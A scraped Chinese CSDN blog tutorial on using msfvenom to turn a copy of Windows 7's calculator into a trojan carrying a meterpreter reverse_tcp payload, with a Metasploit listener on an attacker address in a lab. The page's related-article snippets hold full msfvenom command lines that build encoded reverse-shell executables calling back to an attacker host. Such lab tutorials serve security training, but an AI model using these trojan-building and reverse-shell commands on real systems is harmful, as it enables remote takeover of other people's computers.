利用msfvenom渗透win7

最新推荐文章于 2024-05-22 09:58:13 发布
最新推荐文章于 2024-05-22 09:58:13 发布
阅读量1.2w 收藏 20
点赞数 5
分类专栏: metasploit 文章标签: win7 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34841823/article/details/53143935
版权

msfvenom是kali linux下一个可以产生自定义payload的程序,接下来我们利用msfvenom产生一个新的win7下的计算器后门程序,利用windows/meterpreter/reverse_tcp来对目标靶机windows7进行控制。


1.msfvenom的基本用法:


可以看到一些常用的选项:

Options:
    -p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
    -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
    -n, --nopsled    <length>        payload预先指定一个NOP滑动长度
    -f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
    -e, --encoder    [encoder]       指定需要使用的encoder(编码器)
    -a, --arch       <architecture>  指定payload的目标架构
        --platform   <platform>      指定payload的目标平台
    -s, --space      <length>        设定有效攻击荷载的最大长度
    -b, --bad-chars  <list>          设定规避字符集,比如: &#039;\x00\xff&#039;
    -i, --iterations <count>         指定payload的编码次数
    -c, --add-code   <path>          指定一个附加的win32 shellcode文件
    -x, --template   <path>          指定一个自定义的可执行文件作为模板
    -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
        --payload-options            列举payload的标准选项
    -o, --out   <path>               保存payload
    -v, --var-name <name>            指定一个自定义的变量,以确定输出格式
        --shellest                   最小化生成payload
    -h, --help                       查看帮助选项
        --help-formats               查看msf支持的输出格式列表

2.利用msfvenom生成后门程序:

先将win7上原来有的计算器程序拷贝到kali上

然后按照选项,将windows/meterpreter/reverse_tcp这个payload附加到calc.exe之上,生成一个新的backdoor.exe,还要设置好监听地址,这里是192.168.1.136;设置好监听端口(LPORT=4444),并使用x86/shikata_ga_nai这种编码方式。生成新的后门程序:


并将后门程序设置为可以作为执行文件执行:



3.进入msfconsole进行监听:

之后的工作就是进行msfconsole在4444号端口进行持续监听,等待靶机执行后门程序然后反馈给windows/meterpreter/reverse_tcp获取权限:




4.靶机执行后门程序:

之后如果靶机执行了kali发给他的后门程序,就会反馈到kali上获得一个shell,从而就完成对靶机的渗透:



TravisZeng
关注
  • 5
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msfvenom实战win7拿shell
幸福诗歌的博客
01-24 640
首先可以查询下msfvenom使用,可以参考以下博客: https://www.cnblogs.com/xishaonian/p/6851475.html   我这次使用靶机是win7(sp1)  因此选择生成的payload为exe(可执行文件类型)  Windows Msfvenom –platform windows –a x86 –p windows/meterp...
局域网渗透的一些小工具(支持win7
10-31
一些内网的,命令行格式的工具,可以来看看,很简单
使用msfvenom 对windows 7 shell
weixin_68281676的博客
09-03 502
windows提权
如何使用kali来入侵(渗透)一台windows
最新发布
zz12345600354的博客
05-22 766
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
msfvenom使用
A_Z_dd的博客
06-01 530
娱乐身心即可
msfvenom基本使用
weixin_53440207的博客
02-24 281
msfvenom具体使用教程
76-76.渗透测试-msfvenom 常用参数下.mp4
05-10
76-76.渗透测试-msfvenom 常用参数下.mp4
75-75.渗透测试-msfvenom 常用参数上.mp4
05-10
75-75.渗透测试-msfvenom 常用参数上.mp4
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
以下是对`msfvenom`的详细解释以及如何使用它生成木马进行渗透测试。 首先,`msfvenom`允许测试者创建不同类型的payload,这些payload可以在目标系统上执行特定的任务,如建立Meterpreter会话、执行命令或下载其他...
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
利用MSF渗透windows系统,windows数据库,linux系统实验
Cwillchris的博客
10-18 1624
实验环境: kali:172.16.12.30 windows靶机:172.16.12.4 用户名:administrator 密码:vgrant centos靶机:172.16.12.11 用户名:root 密码:123 实验步骤: 一、攻击LINUX服务器 1、扫描目标机获取哪些服务和端口开启 ┌──(root????kali)-[~/desktop] └─# msfdb run msf6 > db_nmap -A -v 172.16.12.4 查看目标器服务列表
Kali Linux渗透测试--利用漏洞ms17-010对windows Server 2008 r2渗透
无崖子的博客
08-24 4206
实验环境在本地搭建 攻击机:Kali Linux 2019 ip:192.168.5.11 靶机:Windows 7或Windows Server 2008 r2 ip 192.168.5.22 1.查看靶机445端口是否开启,利用zenmap扫描端口,发现445端口开启 ...
网络安全工程师教你Kali Linux:Windows计算机攻防实战技巧
Kali与编程
09-14 1961
1.背景介绍 msfvenom是msfpayload和msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线,在黑客圈子,这款工具略有名气。 之前的教程内容都是关于如何生成木马并进行攻击,而本节课我们着重讲解当用户计算机受到木马攻击的危害及演示防御木马病毒实战。 2.准备工作 2.1 一个安装好kali linux系统的物理机(或者是虚拟机) 2.2 一给安装好windows系统的物理机(或者是虚拟机) 2.3 整装待发的小白一个 3.msfvenom生成木马及ms
Web渗透小案例——利用Metasploit(MSF)拿下Windows7
Mr_Wanderer的博客
08-01 588
文章目录开启MSF攻击开始使用Auxiliary辅助模块嗅探目标选择和设置攻击模块运行攻击脚本拿下服务器后的工作关闭靶机防火墙拿到shell权限 开启MSF 开启数据库: service postgresql start 初始化msf数据库(第一次使用msf需要): msfdb init 开启MSF: msfconsole 查看数据连接状态: db_status 攻击开始 使用Auxiliary辅助模块嗅探目标 选择模块: use auxiliary/scanner/smb/smb_
网络安全工程师教你:100多个Kali Linux白帽子安全工具使用
10-19
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。面向专业的安全测试和安全审计。集成化:预装超过300个安全测试工具。兼容好:Kali可以安装到手机、PC和树莓派等。安全性:Kali Linux开发团队由一群可信任的人组成,他们只能在使用多种安全协议的时候提交包或管理源。免费用: Kali Linux一如既往的免费。你永远无需为Kali Linux付费。 
制作windows和linux客户端恶意软件进行渗透
m0_47510703的博客
01-23 3486
一、生成Windows后门程序获取shell 使用msfvenom制作简易后门程序 msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe
Metapsloit后渗透Windows攻击(亲测metepreter使用教程)
wanqianshao的博客
04-02 6036
Meterpreter是什么? 在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。 如何进入meterpreter? 实验环境: kali metasploit 192.168.31.135 windows7 192.168.31.160 实验步骤: msfvenom -
kali渗透centos7
03-07
5. 漏洞利用:根据已发现的漏洞使用Kali Linux中的漏洞利用工具,如ExploitDB、MSFvenom等,对CentOS 7系统进行攻击,以获取更高的权限或执行特定操作。 6. 持久化访问:在成功入侵CentOS 7系统后,使用Kali ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值